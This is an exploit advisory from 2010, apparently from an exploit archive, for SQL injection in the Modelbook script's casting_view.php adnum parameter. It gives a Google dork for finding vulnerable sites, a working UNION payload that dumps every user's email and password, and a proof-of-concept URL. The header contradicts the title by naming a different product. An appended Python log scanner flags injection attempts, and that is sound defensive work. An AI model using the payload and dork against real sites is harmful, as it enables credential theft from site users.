Modelbook (casting_view.php) SQL Injection Vulnerability

2010-04-29T00:00:00
ID 1337DAY-ID-12049
Type zdt
Reporter v3n0m
Modified 2010-04-29T00:00:00

Description

Exploit for the PHP platform, in the web applications category

                                        
========================================================
Modelbook (casting_view.php) SQL Injection Vulnerability
========================================================

Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : April, 29-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : AlstraSoft AskMe Pro
Vendor      : http://www.rocky.nu/
Price       : $100.00 USD
Google Dork : allinurl:casting_view.php?adnum=
Overview    :
 
Modelbook is a full-featured web community script: a very extensive and
powerful web application written in PHP. 100% open source code, no encryption.
----------------------------------------------------------------
 
Exploit:
~~~~~~~
 
-9999+union+all+select+1,group_concat(email,char(58),pass)v3n0m,3,4,5,6,7,8,9,10+from+users--
 
 
SQLi p0c:
~~~~~~~
 
http://127.0.0.1/[path]/casting_view.php?adnum=[SQLi]
 
----------------------------------------------------------------
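
A detection check for the parameter named above, added here as an example (it is not part of the original advisory or the vendor's code): it scans access-log lines for requests to casting_view.php whose adnum value is not a plain integer and notes any SQL tokens in it. Assumptions: combined-format logs, legitimate adnum values are numeric IDs, and the sample lines, IP addresses and /app/ path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request portion of a combined-format access-log line (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Tokens typical of UNION-based injection; used only to annotate a finding.
SQL_TOKENS = re.compile(
    r"\b(?:union|select|from|group_concat|information_schema)\b|--|/\*", re.I)

# Constructed sample lines (documentation IP ranges, hypothetical /app/ path).
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Apr/2010:10:00:01 +0700] '
    '"GET /app/casting_view.php?adnum=42 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [29/Apr/2010:10:02:13 +0700] '
    '"GET /app/casting_view.php?adnum=-1+union+all+select+1,2,3+from+users-- '
    'HTTP/1.1" 200 5301',
    '198.51.100.23 - - [29/Apr/2010:10:02:40 +0700] '
    '"GET /app/casting_view.php?adnum=42%27 HTTP/1.1" 200 312',
    '203.0.113.7 - - [29/Apr/2010:10:03:05 +0700] '
    '"GET /app/index.php?adnum=abc HTTP/1.1" 200 900',
]


def check_line(line):
    """Return a finding for a suspicious casting_view.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith("/casting_view.php"):
        return None
    # parse_qs percent-decodes and maps '+' to a space, as PHP does for $_GET.
    for value in parse_qs(url.query, keep_blank_values=True).get("adnum", []):
        # Assumption: a legitimate adnum is a plain non-negative integer.
        if re.fullmatch(r"[0-9]{1,10}", value):
            continue
        tokens = sorted({t.group(0).lower() for t in SQL_TOKENS.finditer(value)})
        return {"ip": m.group("ip"), "adnum": value, "sql_tokens": tokens}
    return None


def scan(lines):
    """Check every log line and return the findings in input order."""
    return [f for f in map(check_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Any non-numeric adnum is reported even when no SQL token matches, so encoded or obfuscated values still surface for review.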


